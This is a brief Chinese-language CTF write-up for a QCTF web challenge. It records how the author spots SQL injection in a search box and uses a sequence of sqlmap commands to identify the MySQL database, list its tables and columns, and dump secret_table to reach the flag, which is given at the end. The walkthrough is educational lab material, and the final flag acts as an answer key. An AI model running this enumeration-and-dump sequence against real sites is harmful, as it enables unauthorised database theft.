打开文件发现有个搜索框，考虑是XSS或SQL注入，输入弹框语句不显示考虑到SQL注入，抓包将抓包信息保存为txt,用sqlmap爆破。

输入：sqlmap -r “sql.txt”,输出如下数据库版本信息为MYSQL

接着输入：sqlmap -r “sql.txt” --current-db 输出当前使用的数据库名为news

接着输入：sqlmap -r “sql.txt” -D news --tables输出当前的表名，猜测flag应该在secret_table中

输入：sqlmap -r “sql.txt” -D news -T secret_table --columns输入列

输入：sqlmap -r “sql.txt” -D news -T secret_table --dump输出flag信息。

QCTF{sq1_inJec7ion_ezzz}